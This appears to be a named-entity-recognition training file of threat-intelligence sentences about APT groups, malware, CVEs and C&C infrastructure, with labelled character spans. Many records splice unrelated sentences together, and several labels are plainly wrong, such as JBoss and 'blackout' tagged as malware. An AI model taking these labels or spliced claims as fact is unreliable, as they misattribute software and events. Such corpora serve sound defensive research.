{"text": "PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome , Firefox , and Internet Explorer to a file . While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions .", "spans": {"MALWARE: PICKPOCKET": [[0, 10]], "FILEPATH: Backdoor.Nidiran": [[253, 269]]}, "info": {"id": "cyberner_stix_train_001645", "source": "cyberner_stix_train"}}
{"text": "Office 365 ATP sandbox employs special mechanisms to avoid being detected by similar checks . APT32 poses a threat to companies doing business or preparing to invest in Vietnam . The .png cover file is actually a valid image file that is not malicious on its own . This new ransomware variant does n't have any novel features or functionality and points to the challenges organizations are facing as the landscape continues to shift and a plethora of new actors join their ranks .", "spans": {"SYSTEM: Office 365 ATP": [[0, 14]], "THREAT_ACTOR: APT32": [[94, 99]]}, "info": {"id": "cyberner_stix_train_001646", "source": "cyberner_stix_train"}}
{"text": "Although the current target list is limited to Spanish apps , it seems that the actor is taking into account that the bot should also be able to target other countries , seeing that the path used in the inject requests contains the country code of the targeted institution . Additionally , the same DLL sideloading technique observed in the Visma attack was used , and many of the tools deployed by the APT10 shared naming similarities as well 1.bat , cu.exe , ss.rar , r.exe , pd.exe . We also identified another malware family , HomamDownloader , sharing some servers with Daserf .", "spans": {"TOOL: Visma": [[341, 346]], "THREAT_ACTOR: APT10": [[403, 408]], "TOOL: 1.bat": [[444, 449]], "TOOL: cu.exe": [[452, 458]], "TOOL: ss.rar": [[461, 467]], "TOOL: r.exe": [[470, 475]], "TOOL: pd.exe": [[478, 484]], "MALWARE: HomamDownloader": [[531, 546]], "MALWARE: Daserf": [[575, 581]]}, "info": {"id": "cyberner_stix_train_001647", "source": "cyberner_stix_train"}}
{"text": "Called Greenbug , this group is believed to be instrumental in helping Shamoon steal user credentials of targets ahead of Shamoon 's destructive attacks . In particular , the threat actors have exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code .", "spans": {"VULNERABILITY: CVE-2011-3544": [[204, 217]], "MALWARE: HTTPBrowser backdoor": [[285, 305]], "VULNERABILITY: CVE-2010-0738": [[312, 325]], "MALWARE: JBoss": [[347, 352]], "VULNERABILITY: exploit": [[453, 460]]}, "info": {"id": "cyberner_stix_train_001648", "source": "cyberner_stix_train"}}
{"text": "The attack On March 24th , 2013 , the e-mail account of a high-profile Tibetan activist was hacked and used to send spear phishing e-mails to their contact list . Just recently , PIVY was the payload of a zero-day exploit in Internet Explorer used in what is known as a \" strategic web compromise \" attack against visitors to a U.S. government website and a variety of others . The attackers appeared to be Chinese-speaking and targeted mainly top-level government agencies and civil and military organizations in countries such as the Philippines , Malaysia , Cambodia , Indonesia , Vietnam , Myanmar , Singapore , Nepal .", "spans": {"TOOL: PIVY": [[179, 183]], "VULNERABILITY: zero-day exploit": [[205, 221]], "THREAT_ACTOR: attackers": [[382, 391]], "ORGANIZATION: government agencies": [[454, 473]], "ORGANIZATION: civil and military organizations": [[478, 510]]}, "info": {"id": "cyberner_stix_train_001649", "source": "cyberner_stix_train"}}
{"text": "] me under names in the format : photo_ [ number ] _img.apk , mms_ [ number ] _img.apk avito_ [ number ] .apk , mms.img_ [ number ] _photo.apk , mms [ number ] _photo.image.apk , mms [ number ] _photo.img.apk , mms.img.photo_ [ number ] .apk , photo_ [ number ] _obmen.img.apk . The threat actors create PlugX DLL stub loaders that will run only after a specific date . S-SHA2init2 . To continue the home security analogy , if the window was nt left open , the attacker would likely have gone somewhere else , and the same principle applies in the digital world .", "spans": {"TOOL: PlugX DLL": [[304, 313]], "FILEPATH: S-SHA2init2": [[370, 381]], "THREAT_ACTOR: attacker": [[461, 469]]}, "info": {"id": "cyberner_stix_train_001650", "source": "cyberner_stix_train"}}
{"text": "This simple measure prevents the Trojan from running and being analyzed in dynamic analysis environments ( sandboxes ) and on the test devices of malware analysts . This report includes details related to the major hacking targets of the SectorJ04 group in 2019 , how those targets were hacked , characteristics of their hacking activities this year and recent cases of the SectorJ04 group’s hacking . One group , which we call Cadelle , uses Backdoor.Cadelspy , while the other , which we've named Chafer , uses Backdoor.Remexi and Backdoor.Remexi.B .", "spans": {"ORGANIZATION: report": [[170, 176]], "THREAT_ACTOR: SectorJ04": [[238, 247], [374, 383]], "THREAT_ACTOR: Cadelle": [[428, 435]], "MALWARE: Backdoor.Cadelspy": [[443, 460]], "THREAT_ACTOR: Chafer": [[499, 505]], "MALWARE: Backdoor.Remexi": [[513, 528]], "MALWARE: Backdoor.Remexi.B": [[533, 550]]}, "info": {"id": "cyberner_stix_train_001651", "source": "cyberner_stix_train"}}
{"text": "mcpef.apk ( SHA256 : a8e7dfac00adf661d371ac52bddc03b543bd6b7aa41314b255e53d810931ceac ) : The malicious system application downloaded from server ( package name – com.android.music.helper ) . Even if CVE-2015-2546 affected Windows 10 , the exploitation would have required much more technical prowess to succeed ; ultimately , SMEP makes it more difficult for attackers . However , FireEye researchers do not have enough insight to reliably report a definitive connection to the Moafee and DragonOK groups .", "spans": {"VULNERABILITY: CVE-2015-2546": [[200, 213]], "THREAT_ACTOR: attackers": [[360, 369]], "ORGANIZATION: FireEye": [[382, 389]], "THREAT_ACTOR: Moafee": [[479, 485]], "THREAT_ACTOR: DragonOK groups": [[490, 505]]}, "info": {"id": "cyberner_stix_train_001652", "source": "cyberner_stix_train"}}
{"text": "The names of the files and their content play a major part in luring victims to open them , as they usually relate to current topics pertaining to Hamas , the Palestinian National Authority , or other recent events in the Middle East .", "spans": {"ORGANIZATION: Hamas": [[147, 152]]}, "info": {"id": "cyberner_stix_train_001653", "source": "cyberner_stix_train"}}
{"text": "Specifically , the app was an Android Package ( APK ) file that will be discussed in more detail shortly . The newer variant of KopiLuwak is now capable of exfiltrating files to the C&C as well as downloading files and saving them to the infected machine . The simplest conclusion based on these facts is that APT1 is operating in China , and most likely in Shanghai .", "spans": {"SYSTEM: Android Package": [[30, 45]], "MALWARE: KopiLuwak": [[128, 137]], "THREAT_ACTOR: APT1": [[310, 314]]}, "info": {"id": "cyberner_stix_train_001654", "source": "cyberner_stix_train"}}
{"text": "The code contains multiple comments in Italian , here is the most noteworthy example : “ Receive commands from the remote server , here you can set the key commands to command the virus ” Here are the available commands : Name Description cd Change current directory to specified quit Close the socket nggexe Execute received command via Python ’ s subprocess.Popen ( ) without outputs ngguploads Upload specified file to the specified URL nggdownloads Download content from the specified URLs and save to specified file nggfilesystem Dump file structure of Dubbed ‘Operation Sheep’ , this massive data stealing campaign is the first known campaign seen in the wild to exploit the Man-in-the-Disk vulnerability revealed by Check Point Research earlier last year . FIN5 is a financially motivated threat group that has targeted personally identifiable information and payment card information .", "spans": {"SYSTEM: Python": [[338, 344]], "THREAT_ACTOR: ‘Operation Sheep’": [[565, 582]], "VULNERABILITY: Man-in-the-Disk": [[681, 696]], "THREAT_ACTOR: FIN5": [[764, 768]]}, "info": {"id": "cyberner_stix_train_001655", "source": "cyberner_stix_train"}}
{"text": "Collect information about the infected machine .", "spans": {}, "info": {"id": "cyberner_stix_train_001656", "source": "cyberner_stix_train"}}
{"text": "However , we were able to successfully analyze Suckfly malware samples and extract some of the communications between the Nidiran back door and the Suckfly command and control ( C&C ) domains .", "spans": {"THREAT_ACTOR: Suckfly": [[47, 54], [148, 155]], "MALWARE: Nidiran": [[122, 129]], "TOOL: command and control": [[156, 175]], "TOOL: C&C": [[178, 181]]}, "info": {"id": "cyberner_stix_train_001657", "source": "cyberner_stix_train"}}
{"text": "We came across the names Photo , Message , Avito Offer , and MMS Message . CTU researchers have not observed TG-3390 actors performing reconnaissance prior to compromising organizations . Running the script removes the remaining files and scripts from previous attacks , keeping a low profile to evade detection . “ It appears to be the email address Will used for his profiles , ” the IT director replied .", "spans": {"ORGANIZATION: CTU": [[75, 78]], "THREAT_ACTOR: TG-3390": [[109, 116]], "ORGANIZATION: compromising organizations": [[159, 185]], "THREAT_ACTOR: Will": [[351, 355]], "ORGANIZATION: IT director": [[386, 397]]}, "info": {"id": "cyberner_stix_train_001658", "source": "cyberner_stix_train"}}
{"text": "It enables the bot to stream screenshots and send them to the C2 so that actors can see what is happening on the screen of the infected device . This indictment attributed the intrusions to APT10 , a group that had been conducting the malicious activities for over a decade on behalf of the MSS , China’s civilian human intelligence agency . One of the Minzen samples ( SHA256 : 9374040a9e2f47f7037edaac19f21ff1ef6a999ff98c306504f89a37196074a2 ) found in the Republic of Korea in December 2016 installs simple backdoor module as a final payload on a compromised computer .", "spans": {"THREAT_ACTOR: APT10": [[190, 195]], "MALWARE: Minzen": [[353, 359]], "FILEPATH: 9374040a9e2f47f7037edaac19f21ff1ef6a999ff98c306504f89a37196074a2": [[379, 443]]}, "info": {"id": "cyberner_stix_train_001659", "source": "cyberner_stix_train"}}
{"text": "The encryption key is different from the one used for sending stolen data via HTTP . Currently , the group is engaged in two major operations : Operation Daybreak and Operation Erebus . The new GRIFFON implant is written to the hard drive before each execution , limiting the “ file-less ” aspect of this method . Greatness incorporates features seen in some of the most advanced PaaS offerings , such as multi - factor authentication ( MFA ) bypass , IP filtering and integration with Telegram bots .", "spans": {"MALWARE: GRIFFON": [[194, 201]], "TOOL: Greatness": [[314, 323]], "SYSTEM: IP filtering": [[452, 464]], "SYSTEM: Telegram bots": [[486, 499]]}, "info": {"id": "cyberner_stix_train_001660", "source": "cyberner_stix_train"}}
{"text": "The spaghetti code in FinFisher dropper This problem is not novel , and in common situations there are known reversing plugins that may help for this task . The actors attempted to exploit CVE-2014-6332 using a slightly modified version of the proof-of-concept ( POC ) code to install a Trojan called Emissary , which is related to the Operation Lotus Blossom campaign . This is , however , only for appearance because the real size or the PE file is between 63 KB and 72 KB , depending on the version . That makes highfidelity threat intelligence and a proactive security stance critically important to success in 2023 .", "spans": {"MALWARE: FinFisher": [[22, 31]], "THREAT_ACTOR: actors": [[161, 167]], "VULNERABILITY: CVE-2014-6332": [[189, 202]], "TOOL: Emissary": [[301, 309]]}, "info": {"id": "cyberner_stix_train_001661", "source": "cyberner_stix_train"}}
{"text": "The Trojan requests Device Administrator rights The Trojan requests permission to use AccessibilityService After installation , the Trojan starts communicating with the cybercriminals ’ C & C server . CTU researchers have observed TG-3390 compromising a target organization 's externally and internally accessible assets , such as an OWA server , and adding redirect code to point internal users to an external website that hosts an exploit and delivers malware . The Shellbot disguises itself as a process named rsync , commonly the binary seen on many Unix- and Linux-based systems to automatically run for backup and synchronization . Anonymous Sudan has targeted organizations associated with infrastructure and key services , including in government and private sectors .", "spans": {"ORGANIZATION: CTU": [[201, 204]], "THREAT_ACTOR: TG-3390": [[231, 238]], "MALWARE: Shellbot": [[468, 476]], "SYSTEM: Unix-": [[554, 559]], "SYSTEM: Linux-based systems": [[564, 583]], "THREAT_ACTOR: Anonymous Sudan": [[638, 653]], "ORGANIZATION: organizations associated with infrastructure": [[667, 711]], "ORGANIZATION: key services": [[716, 728]], "ORGANIZATION: government": [[744, 754]], "ORGANIZATION: private sectors": [[759, 774]]}, "info": {"id": "cyberner_stix_train_001662", "source": "cyberner_stix_train"}}
{"text": "But Dvmap is very special rooting malware . In 2015 , the Metel gang began to target banks and financial institutions directly . It monitors whether the user is browsing the web page . On December 17th , the Ukrainian capital Kiev was hit by a blackout .", "spans": {"MALWARE: Dvmap": [[4, 9]], "ORGANIZATION: banks": [[85, 90]], "ORGANIZATION: financial institutions": [[95, 117]], "MALWARE: blackout": [[244, 252]]}, "info": {"id": "cyberner_stix_train_001663", "source": "cyberner_stix_train"}}
{"text": "Audit existing firewall rules and close all ports that are not explicitly needed for business .", "spans": {"TOOL: firewall": [[15, 23]]}, "info": {"id": "cyberner_stix_train_001664", "source": "cyberner_stix_train"}}
{"text": "] ponethus [ . Through the information exchanges used by people in the security industry , we learned that several Russian banks were struggling with malicious programs created specifically to attack a particular type of legal banking software . Some of the names the attackers used for it include : Adobe Assistant , Migrated . Stolen credentials can be resold to other threat actors tied to ransomware gangs .", "spans": {"ORGANIZATION: security industry": [[71, 88]], "ORGANIZATION: banks": [[123, 128]], "TOOL: Adobe Assistant": [[300, 315]], "TOOL: Migrated": [[318, 326]]}, "info": {"id": "cyberner_stix_train_001665", "source": "cyberner_stix_train"}}
{"text": "The Center for Applied Research creates means and methods for protecting critical infrastructure from destructive information and technological impacts .", "spans": {"ORGANIZATION: The Center for Applied Research": [[0, 31]]}, "info": {"id": "cyberner_stix_train_001666", "source": "cyberner_stix_train"}}
{"text": ". In order to understand SWAnalytics’ impact , we turned to public download volume data available on Chandashi , one of the app store optimization vendors specialized in Chinese mobile application markets . SecureWorks® Counter Threat Unit™ ( CTU ) researchers analyzed a phishing campaign that targeted a Middle Eastern organization in early January 2017 .", "spans": {"MALWARE: SWAnalytics’": [[25, 37]], "ORGANIZATION: SecureWorks® Counter Threat Unit™": [[207, 240]], "ORGANIZATION: CTU": [[243, 246]], "ORGANIZATION: organization": [[321, 333]]}, "info": {"id": "cyberner_stix_train_001667", "source": "cyberner_stix_train"}}
{"text": "The tool does all that a typical Trojan needs to accomplish: upload , download and execute files , fingerprint target systems . Patchwork uses email as an entry point , which is why securing the email gateACT is important .", "spans": {"MALWARE: Trojan": [[33, 39]], "THREAT_ACTOR: Patchwork": [[128, 137]]}, "info": {"id": "cyberner_stix_train_001668", "source": "cyberner_stix_train"}}
{"text": "The CONFUCIUS_B executable is disguised as a PowerPoint presentation , using a Right-To-Left-Override ( RTLO ) trick and a false icon . Buhtrap resurfaced in the beginning of 2017 in the TwoBee campaign , where it served primarily as means of malware delivery .", "spans": {"MALWARE: CONFUCIUS_B": [[4, 15]], "TOOL: RTLO": [[104, 108]]}, "info": {"id": "cyberner_stix_train_001669", "source": "cyberner_stix_train"}}
{"text": "EventBot is a mobile banking trojan and infostealer that abuses Android ’ s accessibility features to steal user data from financial applications , read user SMS messages , and steal SMS messages to allow the malware to bypass two-factor authentication . According to our statistics , as of the beginning of 2015 this botnet encompassed over 250 000 infected devices worldwide including infecting more than 100 financial institutions with 80% of them from the top 20 list . The actor 's targeting is consistent with Chinese state interests and there are multiple technical artifacts indicating the actor is based in China .", "spans": {"MALWARE: EventBot": [[0, 8]], "SYSTEM: Android": [[64, 71]], "MALWARE: botnet encompassed": [[318, 336]], "ORGANIZATION: financial institutions": [[411, 433]], "THREAT_ACTOR: actor": [[478, 483], [598, 603]]}, "info": {"id": "cyberner_stix_train_001670", "source": "cyberner_stix_train"}}
{"text": "While there is not yet a patch available for the Windows vulnerability , updating Adobe Flash to the latest version will render this in-the-wild exploit innocuous .", "spans": {"SYSTEM: Windows": [[49, 56]], "TOOL: Adobe Flash": [[82, 93]]}, "info": {"id": "cyberner_stix_train_001671", "source": "cyberner_stix_train"}}
{"text": "Based on the samples we collected and traced to 456 distinct IPs , we expect the group to be more active in the coming months as we observed changes on the versions we acquired .", "spans": {}, "info": {"id": "cyberner_stix_train_001672", "source": "cyberner_stix_train"}}
{"text": "Furthermore , there are indications that APT32 actors are targeting peripheral network security and technology infrastructure corporations . In the latest attack , Donot group is targeting Pakistani businessman working in China", "spans": {"THREAT_ACTOR: APT32": [[41, 46]], "ORGANIZATION: security": [[87, 95]], "ORGANIZATION: technology": [[100, 110]], "THREAT_ACTOR: Donot group": [[164, 175]], "ORGANIZATION: Pakistani businessman": [[189, 210]]}, "info": {"id": "cyberner_stix_train_001673", "source": "cyberner_stix_train"}}
{"text": "By researching historical data relevant to C&C 176.31.112.10 , we discovered that on February 16th 2015 , the server was sharing an SSL certificate with another IP address allocated to CrookServers and also hosted at OVH : 213.251.187.145 .", "spans": {"TOOL: C&C": [[43, 46]], "IP_ADDRESS: 176.31.112.10": [[47, 60]], "ORGANIZATION: CrookServers": [[185, 197]], "TOOL: OVH": [[217, 220]], "IP_ADDRESS: 213.251.187.145": [[223, 238]]}, "info": {"id": "cyberner_stix_train_001674", "source": "cyberner_stix_train"}}
{"text": "The updates expanded scanner parameters and targets , looped execution of files via error messages , improved evasion techniques for scanning activities , and improved mining profits by killing off both the competition and their own previous miners .", "spans": {}, "info": {"id": "cyberner_stix_train_001675", "source": "cyberner_stix_train"}}
{"text": "DoublePulsar is then used to inject a secondary payload , which runs in memory only . Without going too deep into the rabbit hole , there are several indicators pointing to an Iranian nexus , including language artifacts in the tool-marks used by the attacker , as well as network activity tying this actor to a very specific location that we have high confidence in not being spoofed .", "spans": {"MALWARE: DoublePulsar": [[0, 12]]}, "info": {"id": "cyberner_stix_train_001676", "source": "cyberner_stix_train"}}
{"text": "Once successfully executed , the macro will install a payload and save a document to the system .", "spans": {"TOOL: macro": [[33, 38]]}, "info": {"id": "cyberner_stix_train_001677", "source": "cyberner_stix_train"}}
{"text": "The toolset includes reams of documentation explaining how the cyber weapons work , as well as details about their use in highly classified intelligence operations abroad . The structure of the fake App Store matches the application bundle structure and provides both English and German interfaces .", "spans": {"TOOL: App Store": [[199, 208]]}, "info": {"id": "cyberner_stix_train_001678", "source": "cyberner_stix_train"}}
{"text": "The stolen data is copied into a hidden directory as “ %MYPICTURES%\\%volume serial number% “ , from where it can be exfiltrated by the attackers using one of the AZZY implants .", "spans": {"MALWARE: AZZY": [[162, 166]]}, "info": {"id": "cyberner_stix_train_001679", "source": "cyberner_stix_train"}}
{"text": "It contains an additional meta tag at the end of the web page source code , \" refreshing \" ( redirecting ) the site visitor to the weaponized document . com .", "spans": {}, "info": {"id": "cyberner_stix_train_001680", "source": "cyberner_stix_train"}}
{"text": "CTU researchers assess with moderate confidence that the group is operating from the Russian Federation and is gathering intelligence on behalf of the Russian government .", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "cyberner_stix_train_001681", "source": "cyberner_stix_train"}}
{"text": "Upon reviewing the traffic from these IP S-PROT addresses , system owners may find that some traffic corresponds to malicious activity and some to legitimate activity .", "spans": {"TOOL: IP S-PROT addresses": [[38, 57]], "TOOL: system": [[60, 66]]}, "info": {"id": "cyberner_stix_train_001682", "source": "cyberner_stix_train"}}
{"text": "The sux library appears to be a customized super user ( su ) tool that includes code from the com.koushikdutta.superuser app and carries the equivalent of a super user ( su ) binary in order to run privileged commands on the system . Alternatively , it is also possible that APT41 injected malicious code into the package prior to compilation , circumventing the need to steal the code-signing certificate and compile it on their own . While the JHUHUGIT ( and more recently , \" JKEYSKW \" ) implant used in most of the Sofacy attacks , high profile victims are being targeted with another first level implant , representing the latest evolution of their AZZY Trojan .", "spans": {"THREAT_ACTOR: APT41": [[275, 280]], "MALWARE: JHUHUGIT": [[446, 454]], "MALWARE: JKEYSKW": [[479, 486]], "MALWARE: AZZY Trojan": [[654, 665]]}, "info": {"id": "cyberner_stix_train_001683", "source": "cyberner_stix_train"}}
{"text": "Users of iOS can remove the malicious profile using the Apple Configurator 2 , Apple ’ s official iOS helper app for managing Apple devices . The targets were similar to a 2015 TG-4127 campaign — individuals in Russia and the former Soviet states , current and former military and government personnel in the U.S. and Europe , individuals working in the defense and government supply chain , and authors and journalists — but also included email accounts linked to the November 2016 United States presidential election . The text mode sender uses the same hardcoded transaction ID 0xa4a3; however, instead of sending queries for TXT resource records, the malware uses A resource . Rhysida will enumerate through directories and files in directories starting from “ A : ” to “ Z : ” drives , ensure they ’re missing from the “ exclude list ” and then “ process , ” i.e. , encrypt the files .", "spans": {"SYSTEM: iOS": [[9, 12], [98, 101]], "ORGANIZATION: Apple": [[56, 61], [79, 84], [126, 131]], "ORGANIZATION: military": [[268, 276]], "ORGANIZATION: government personnel": [[281, 301]], "ORGANIZATION: defense": [[354, 361]], "ORGANIZATION: government": [[366, 376]], "ORGANIZATION: authors": [[396, 403]], "ORGANIZATION: journalists": [[408, 419]], "MALWARE: Rhysida": [[681, 688]]}, "info": {"id": "cyberner_stix_train_001684", "source": "cyberner_stix_train"}}
{"text": "] infogoogle-support-team [ . As in the past , these messages have been sent accounts believed to be fake and accounts compromised by Infy , including Kurdish activists that had previously been compromised by the Flying Kitten actor group . In fact , Shanghai was listed as the registrant ’s city in at least 24 of the 107 ( 22% ) registrations . Monitor for contextual data about an account , which may include a username , user ID , environmental data that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"ORGANIZATION: Kurdish activists": [[151, 168]], "THREAT_ACTOR: Flying Kitten actor group": [[213, 238]]}, "info": {"id": "cyberner_stix_train_001685", "source": "cyberner_stix_train"}}
{"text": "Method onPostExecute : to handle instructions from remote C2 Figure 6 shows an example response sent back from one C2 server . In May 2016 , we published a blog detailing a spear phishing campaign targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware . The attackers put great effort to carefully select the targets located in specific countries based on the victim 's keyboard layout . The actor hunts for confidential information stored in the networks of governmental organizations , political groups and think tanks , as well as various individuals involved in defense and geopolitical related research .", "spans": {"ORGANIZATION: banks": [[207, 212]], "TOOL: POWBAT malware": [[289, 303]], "ORGANIZATION: governmental organizations": [[511, 537]], "ORGANIZATION: political groups": [[540, 556]], "ORGANIZATION: think tanks": [[561, 572]], "ORGANIZATION: various individuals involved in defense and geopolitical related research": [[586, 659]]}, "info": {"id": "cyberner_stix_train_001686", "source": "cyberner_stix_train"}}
{"text": "It contains an additional meta tag at the end of the web page source code , \" refreshing \" ( redirecting ) the site visitor to the weaponized document . Symantec telemetry identified Cadelle and Chafer activity dating from as far back as July 2014 , however , it's likely that activity began well before this date .", "spans": {"ORGANIZATION: Symantec": [[153, 161]]}, "info": {"id": "cyberner_stix_train_001687", "source": "cyberner_stix_train"}}
{"text": "They also included Dynamic Data Exchange ( DDE ) and Windows Script Component ( SCT ) abuse to their tactics , as well as started exploiting recently reported vulnerabilities . For the sake of this analysis we'll take the Vietnamese backdoor as an example ; the one found in the Indian attack operates in the exact same ACT .", "spans": {"MALWARE: Vietnamese backdoor": [[222, 241]]}, "info": {"id": "cyberner_stix_train_001688", "source": "cyberner_stix_train"}}
{"text": "BRONZE PRESIDENT also uses widely available or modified open-source tools , which could be a strategic effort to reduce the risk of attribution or to minimize the need for tool development resources .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[0, 16]]}, "info": {"id": "cyberner_stix_train_001689", "source": "cyberner_stix_train"}}
{"text": "Indian government org #2 is responsible for implementing network software for different ministries and departments within India 's central government .", "spans": {}, "info": {"id": "cyberner_stix_train_001690", "source": "cyberner_stix_train"}}
{"text": "The choice of a particular payload is determined by the implant ’ s version , and it can be downloaded from the command and control ( C & C ) server soon after the implant starts , or after a specific command . OceanLotus malware family samples used no earlier than 2017 . TA505 is a financially motivated threat group that has been active since at least 2014 .", "spans": {"THREAT_ACTOR: OceanLotus": [[211, 221]], "THREAT_ACTOR: TA505": [[273, 278]]}, "info": {"id": "cyberner_stix_train_001691", "source": "cyberner_stix_train"}}
{"text": "There are previous reports of threat actors including APT10 and APT1 using dynamic DNS . Over the months following the elections , the accounts of Iranians that had been compromised by the actors were then used for spreading the malware .", "spans": {"THREAT_ACTOR: threat actors": [[30, 43]], "THREAT_ACTOR: APT10": [[54, 59]], "THREAT_ACTOR: APT1": [[64, 68]], "TOOL: dynamic DNS": [[75, 86]], "ORGANIZATION: Iranians": [[147, 155]]}, "info": {"id": "cyberner_stix_train_001692", "source": "cyberner_stix_train"}}
{"text": "During our analysis of this sample , we did notice that the class itself is never called or used by the malware . Taking that into account , we classify the Lamberts as the same level of complexity as Regin , ProjectSauron , Equation and Duqu2 , which makes them one of the most sophisticated cyber espionage toolkits we have ever analysed . Additionally , the new campaigns we uncovered further highlight the correlation between APT groups ceasing and retooling operations after media exposure , as APT12 used the same strategy after compromising the New York Times in Oct 2012 . For example , Registry keys and other configuration settings can be used to modify protocol and port pairings.[3 ] APT - C-36 has used port 4050 for C2 communications.[4 ]", "spans": {"TOOL: Lamberts": [[157, 165]], "TOOL: Regin": [[201, 206]], "TOOL: ProjectSauron": [[209, 222]], "TOOL: Equation": [[225, 233]], "TOOL: Duqu2": [[238, 243]], "THREAT_ACTOR: APT12": [[500, 505]], "ORGANIZATION: New York Times": [[552, 566]], "THREAT_ACTOR: APT - C-36": [[696, 706]]}, "info": {"id": "cyberner_stix_train_001693", "source": "cyberner_stix_train"}}
{"text": "This image file exists on the third page of the document , so the user would have to scroll down in the document to this third page to get the SWF file to run .", "spans": {"TOOL: SWF": [[143, 146]]}, "info": {"id": "cyberner_stix_train_001694", "source": "cyberner_stix_train"}}
{"text": "Our research demonstrates the efforts used by attackers to reduce the risk of detection of the Spark backdoor by various security products .", "spans": {"MALWARE: Spark backdoor": [[95, 109]]}, "info": {"id": "cyberner_stix_train_001695", "source": "cyberner_stix_train"}}
{"text": "This library is used because it uses the only ( publicly known ) way to retrieve this information on Android 6 ( using the process OOM score read from the /proc directory ) . Kaspersky Lab also found some watering hole attacks , including one on a website belonging to a prominent member of the Japanese government . The incident , as described by security researchers with Moscow-based cybersecurity firm Kaspersky Lab , shines a rare light on the opaque although apparently vibrant market for software exploits and spyware , which in this case appears to have been purchased by a nation-state . Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis / parsing of network data .", "spans": {"SYSTEM: Android 6": [[101, 110]], "ORGANIZATION: Kaspersky Lab": [[175, 188], [406, 419]], "MALWARE: spyware": [[517, 524]], "THREAT_ACTOR: Adversaries": [[597, 608]]}, "info": {"id": "cyberner_stix_train_001696", "source": "cyberner_stix_train"}}
{"text": "The ORat tool , which appears to be used less frequently by the group , communicates over TCP port 80 using a raw socket protocol ( not HTTP ) .", "spans": {"MALWARE: ORat": [[4, 8]]}, "info": {"id": "cyberner_stix_train_001697", "source": "cyberner_stix_train"}}
{"text": "The aggressive nature of Sandworm Team 's previous activity in Europe and the United States exposed their interest in targeting critical systems and indicated preparation for cyber attack . The group is well known : They hijacked WikiLeaks' DNS last month shortly after they took over HBO 's Twitter account ; last year , they took over Mark Zuckerberg 's Twitter and Pinterest accounts ; and they hit both BuzzFeed and TechCrunch not long after that .", "spans": {"THREAT_ACTOR: Sandworm Team": [[25, 38]], "ORGANIZATION: WikiLeaks'": [[230, 240]], "ORGANIZATION: Twitter": [[292, 299], [356, 363]], "ORGANIZATION: Mark Zuckerberg": [[337, 352]], "ORGANIZATION: Pinterest": [[368, 377]], "ORGANIZATION: BuzzFeed": [[407, 415]], "ORGANIZATION: TechCrunch": [[420, 430]]}, "info": {"id": "cyberner_stix_train_001698", "source": "cyberner_stix_train"}}
{"text": "Unit 42 analyzed the use of these six malware families and found that Nigerian actors are currently producing an average of 146 unique samples of malware per month ( see Figure 6 ) . Turla is a notorious group that has been targeting government officials .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "THREAT_ACTOR: actors": [[79, 85]], "THREAT_ACTOR: Turla": [[183, 188]], "ORGANIZATION: government officials": [[234, 254]]}, "info": {"id": "cyberner_stix_train_001699", "source": "cyberner_stix_train"}}
{"text": "Utilizing Diamond Model methodology for characterizing activity by behaviors attached to victims , we began tracking TRITON / TRISIS and immediate enabling activity as a distinct activity group ( collection of behaviors , infrastructure , and victimology ) designated XENOTIME .", "spans": {"TOOL: Diamond Model": [[10, 23]], "MALWARE: TRITON": [[117, 123]], "MALWARE: TRISIS": [[126, 132]], "THREAT_ACTOR: XENOTIME": [[268, 276]]}, "info": {"id": "cyberner_stix_train_001700", "source": "cyberner_stix_train"}}
{"text": "The third timer will fire every 10 seconds and will attempt to register the device into the C2 and register wake-up locks on the system to control the device 's status . Once they have found a victim , they then deploy remote manipulation system binaries (RMS) via self-extracting archives and batch command files . The majority of APT37 activity continues to target South Korea , North Korean defectors , and organizations and individuals involved in Korean Peninsula reunification efforts .", "spans": {"THREAT_ACTOR: they": [[175, 179]], "TOOL: (RMS)": [[255, 260]], "ORGANIZATION: defectors": [[394, 403]]}, "info": {"id": "cyberner_stix_train_001701", "source": "cyberner_stix_train"}}
{"text": "88034e0eddfdb6297670d28ed810aef87679e9492e9b3e782cc14d9d1a55db84 e08f08f4fa75609731c6dd597dc55c8f95dbdd5725a6a90a9f80134832a07f2e 01c5b637f283697350ca361f241416303ab6123da4c6726a6555ac36cb654b5c 1fb06666befd581019af509951320c7e8535e5b38ad058069f4979e9a21c7e1c This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent . Rancor : 83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2abd9e0d . Second , as COSMICENERGY was potentially developed as part of a red team , this discovery suggests that the barriers to entry are lowering for offensive OT threat activity since we normally observe these types of capabilities limited to well resourced or state sponsored actors .", "spans": {"MALWARE: bait document": [[265, 278]], "MALWARE: Word document": [[328, 341]], "VULNERABILITY: CVE-2012-0158": [[362, 375]], "THREAT_ACTOR: Rancor": [[533, 539]], "FILEPATH: 83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2abd9e0d": [[542, 606]], "MALWARE: COSMICENERGY": [[621, 633]]}, "info": {"id": "cyberner_stix_train_001702", "source": "cyberner_stix_train"}}
